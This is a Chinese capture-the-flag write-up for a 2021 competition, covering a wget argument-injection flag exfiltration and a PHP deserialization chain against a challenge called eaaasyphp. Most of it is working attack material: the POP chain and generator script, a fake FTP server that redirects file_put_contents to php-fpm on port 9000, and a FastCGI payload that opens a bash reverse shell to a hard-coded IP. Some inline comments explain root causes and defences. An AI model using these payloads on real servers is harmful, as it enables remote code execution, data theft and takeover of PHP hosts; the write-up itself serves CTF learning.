
陇原战"疫"2021网络安全大赛

December 4, 2021 • Read: 728 • Competition WP

CheckIN

简单的跑一遍

然后

发现了利用点
拿wget把flag带出来即可:

/wget?argv=1&argv=--post-file&argv=/flag&argv=http://ip:port

然后监听就好

eaaasyphp

<?php

class Check {
    // Global gates toggled by the other gadgets. Both start false, so the
    // dangerous branches (the write in Bunny::__toString, the call in
    // Bypass::__destruct) are only reachable after another object's magic
    // method has flipped the corresponding flag.
    public static $str1 = false;
    public static $str2 = false;
}


class Esle {
    // __wakeup runs automatically while unserialize() rebuilds the object, so
    // merely embedding an Esle anywhere in the payload opens the first gate
    // before any __destruct has a chance to fire.
    public function __wakeup()
    {
        Check::$str1 = true;
    }
}


class Hint {

    // $hint is never declared: it is a dynamic property that exists only if
    // unserialize() populated it or __wakeup ran (dynamic properties are
    // deprecated from PHP 8.2). __wakeup resets it to a harmless string so a
    // normally deserialized Hint never reaches the call in __destruct.
    public function __wakeup(){
        $this->hint = "no hint";
    }

    // Only reached when __wakeup did not run (the writeup skips it with a
    // negative property count) and $hint is still unset/falsy: the string is
    // then used as a callable, i.e. phpinfo() is invoked.
    public function __destruct(){
        if(!$this->hint){
            $this->hint = "phpinfo";
            ($this->hint)();
        }  
    }
}


class Bunny {

    // Sink of the chain: an arbitrary write. $filename and $data are undeclared
    // dynamic properties, so unserialize() controls both; $data additionally
    // falls back to the raw `data` request parameter. Because $filename goes
    // straight into file_put_contents(), it may be any stream-wrapper URL
    // (ftp://, php://, ...) rather than a local path — which is what lets the
    // writeup turn a "file write" into an outbound connection. Note the method
    // returns no string; PHP complains about that, but only after the write
    // has already happened.
    public function __toString()
    {
        if (Check::$str2) {
            if(!$this->data){
                $this->data = $_REQUEST['data'];
            }
            file_put_contents($this->filename, $this->data);
        } else {
            throw new Error("Error");
        }
    }
}

class Welcome {
    // Reached through ($this->str4)() in Bypass::__destruct when str4 holds a
    // Welcome. It opens the second gate and then concatenates $username, which
    // forces __toString on whatever object $username contains (a Bunny, above).
    public function __invoke()
    {
        Check::$str2 = true;
        return "Welcome" . $this->username;
    }
}

class Bypass {

    // Entry point of the chain: __destruct fires when the object returned by
    // unserialize() is discarded. $str4 is an undeclared dynamic property used
    // as a callable, so either a plain function name ("phpinfo") or an object
    // with __invoke works. Check::$str1 must already be true; an Esle stored in
    // any other property provides that, because its __wakeup runs during
    // unserialize(), before this destructor.
    public function __destruct()
    {
        if (Check::$str1) {
            ($this->str4)();
        } else {
            throw new Error("Error");
        }
    }
}

// Root cause of the challenge: unserialize() on attacker-controlled input
// instantiates any class in scope and runs its __wakeup/__destruct/
// __toString/__invoke hooks. In real code, never unserialize request data —
// use json_decode(), or at the very least pass ['allowed_classes' => false].
if (isset($_GET['code'])) {
    unserialize($_GET['code']);
} else {
    highlight_file(__FILE__);
}

之前也遇到过一道差不多的题,利用ftp被动模式打fastcgi
然后就是先看看phpinfo的配置
这里有两个方法
一是利用Hint类，二是利用str4，两种方法都可以
所以payload:

/?code=O:4:"Hint":-1:{}

（绕过__wakeup：网上的说法是PHP7 < 7.0.10在反序列化时，属性个数与实际不符即可绕过；但本题版本是7.2，将0改为其他正整数时绕过失败，改为负数即可绕过）
或者

?code=O:6:"Bypass":2:{s:2:"m1";O:4:"Esle":0:{}s:4:"str4";s:7:"phpinfo";}

然后我们发现

这意味着我们无法直接利用file_put_contents写入shell
然后

考虑用file_put_contents去攻击php-fpm
在vps上运行这个脚本

# evil_ftp.py
import socket
# Scripted responder that plays the server side of the FTP dialogue which
# file_put_contents("ftp://...") performs. It never reads what the client
# sends; it only emits a fixed sequence of replies in the order the comments
# below describe, so it works solely because the PHP ftp wrapper issues its
# commands in exactly this order.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.bind(('0.0.0.0', 23))
s.listen(1)
conn, addr = s.accept()
conn.send(b'220 welcome\n')
#Service ready for new user.
#Client send anonymous username
#USER anonymous
conn.send(b'331 Please specify the password.\n')
#User name okay, need password.
#Client send anonymous password.
#PASS anonymous
conn.send(b'230 Login successful.\n')
#User logged in, proceed. Logged out if appropriate.
#TYPE I
conn.send(b'200 Switching to Binary mode.\n')
#Size /
conn.send(b'550 Could not get the file size.\n')
#EPSV (1)
conn.send(b'150 ok\n')
#PASV
# The passive-mode reply is the whole point: it directs the client to open its
# data connection to 127.0.0.1, port 0*256+9000, and STOR the "file" there, so
# the bytes handed to file_put_contents() are delivered to that loopback port
# on the PHP host instead of to this server. Defensive takeaway: a php-fpm
# listening on a loopback TCP port is reachable by any server-side request made
# from the same host; binding it to a unix socket, or allow_url_fopen=Off,
# closes this path. (Code 227 is the plain PASV reply; the text says
# "Extended", but the client only parses the numbers.)
conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,9000)\n') #STOR / (2)
conn.send(b'150 Permission denied.\n')
#QUIT
conn.send(b'221 Goodbye.\n')
conn.close()

然后利用gopher生成发向fpm的数据包

%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH105%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00i%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/121.41.59.127/8080%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

然后构造pop

<?php

class Check {
    // Local stand-in so the generator script runs; static properties are not
    // part of serialize() output, so these values never reach the target.
    public static $str1 = false;
    public static $str2 = false;
}


class Esle {
    // Re-declared with a constructor instead of __wakeup so that building the
    // object locally has no side effects. Only the class name (with zero
    // properties) ends up in the serialized string; the target's own
    // Esle::__wakeup is what runs when it is unserialized there.
    public function __construct()
    {
        Check::$str1 = true;
    }
}
class Bunny {
    // Declared public so serialize() emits both properties; the target's
    // Bunny::__toString reads them as dynamic properties. No __toString here,
    // so nothing fires during local generation.
    public $data;
    public $filename;
    public function __construct()
    {
        // ftp:// stream URL: on the target, file_put_contents() connects to this
        // host/port (the evil_ftp.py responder) and sends $data as the upload.
        $this->filename = "ftp://aaa@121.41.59.127:23/123";
        // The FastCGI record shown in the prose above, decoded back to raw bytes.
        $this->data=urldecode("%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH105%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00i%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/121.41.59.127/8080%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00");
    }
}

class Welcome {
    // $username is a Bunny so that, on the target, the "Welcome" . $username
    // concatenation in Welcome::__invoke triggers Bunny::__toString. The
    // Check::$str2 assignment is local only (statics are not serialized).
    public $username;
    public function __construct()
    {
        Check::$str2 = true;
        $this->username = new Bunny();
    }
}

class Bypass {
    // Outermost object. $m1 carries the Esle whose __wakeup (on the target)
    // sets Check::$str1 during unserialize(); $str4 carries the invokable
    // Welcome that Bypass::__destruct calls afterwards.
    public $str4 ;
    public $m1;
    public function __construct()
    {
        $this->m1 = new Esle();
        $this->str4 = new Welcome();
    }
}
// Serialize the chain and URL-encode it for use as the `code` query parameter.
$pop = new Bypass();

echo urlencode(serialize($pop));

打过去监听起就行

当然还有其他师傅的方法
方法一
方法二

Last Modified: March 2, 2022